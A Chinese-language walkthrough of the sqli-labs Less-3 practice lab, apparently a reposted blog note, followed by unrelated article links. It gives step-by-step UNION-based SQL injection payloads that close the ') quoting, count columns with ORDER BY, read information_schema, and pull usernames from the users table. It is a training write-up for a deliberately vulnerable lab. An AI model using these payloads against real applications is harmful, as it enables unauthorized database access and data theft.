当前位置: 首页 > news >正文

sqlilabs less-3 笔记

1.判断是字符型还是数字型

?id=1

?id=2-1


由于显示的数据不同,可知不是数字型

?id=1'


发现报错中有),考虑将括号闭合,并将多余括号通过–+注释掉

?id=1') --+


发现成功登录
2.判断查询了几位数据

?id=1') order by 4 --+

?id=1') order by 3 --+


3.判断显示位

?id=-1') union select 111,222,333 --+


4.查询所有数据库

?id=-1') union select 111,222,group_concat(schema_name) from information_schema.schemata --+

5.查看当前使用的数据库

?id=-1') union select 111,222,database() --+


6.查看那当前数据库所包含的表名

?id=-1') union select 111,222,group_concat(table_name) from information_schema.tables where table_schema=database() --+


7.查看users表的所有字段名

?id=-1') union select 111,222,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+


8.查看users表的username字段

?id=-1') union select 111,222,username from security.users --+

http://www.jsqmd.com/news/470426/

相关文章:

  • IDEA创建Spring Boot项目教程
  • 2026年流行的“穷装风“装修:花最少的钱装出最舒服的家,年轻人都爱这么装
  • 加州大学洛杉矶分校:机器人实现复杂环境动态思考与行动同步
  • 工业级耐用与智能安防的卓越品牌之选
  • 百考通AI文献综述生成,筑牢研究的理论根基
  • 3.12打卡day33
  • comsol 三维模型如何设置截线 并画出截线位置的电场(一维场)
  • opensearch 检索xc无法检索到xcverse
  • Windows11无线网络详细诊断报告脚本
  • 2026年自己动手做一张水果海报,关键步骤原来是这几步
  • 2026年软文发稿平台TOP5榜单:覆盖量、性价比、口碑三大维度实测
  • 小龙虾(openclaw)都能干什么?
  • OoderAgent-Skills 技术规范设计深度揭秘:构建AI原生时代的技能生态系统
  • 单包攻击和DDoS(AI)
  • 覆盖全规模选型!2026年5 款高口碑服装ERP系统推荐
  • USB继电器控制器(Windows10/11)
  • 【深度解析GB29743.2-2025:新能源汽车冷却液电导率核心要求及选型规范】
  • 纯净win环境手动部署OpenClaw 小龙虾(汉化版)
  • 常用的游戏开发的skills以及使用教程
  • Python flask 学生模拟考试答题练习在线学习平台
  • 【边打字.边学昆仑正义文化】_11_痛苦的根源与解脱(1)
  • OpenSearch TextQueryType 几种类型都是什么意思
  • Continue Pretrain
  • 全球人形机器人产业发展情况
  • RAG几种技术组合 向量检索 GraphRAG PageIndex ES
  • 计算机毕业设计源码:Python得物平台鞋类数据可视化分析与推荐系统 Django框架 协同过滤算法 可视化 数据分析 推荐系统 大数据 大模型 agent(建议收藏)✅
  • 【模板】树状数组 2(洛谷-P3368)
  • 智慧医疗磁共振成像MRI自闭症检测数据集VOC+YOLO格式999张2类别
  • 生活简单就好
  • 发那科(FANUC)机器人配置麦格米特焊机全流程详解(附实操步骤+故障排查)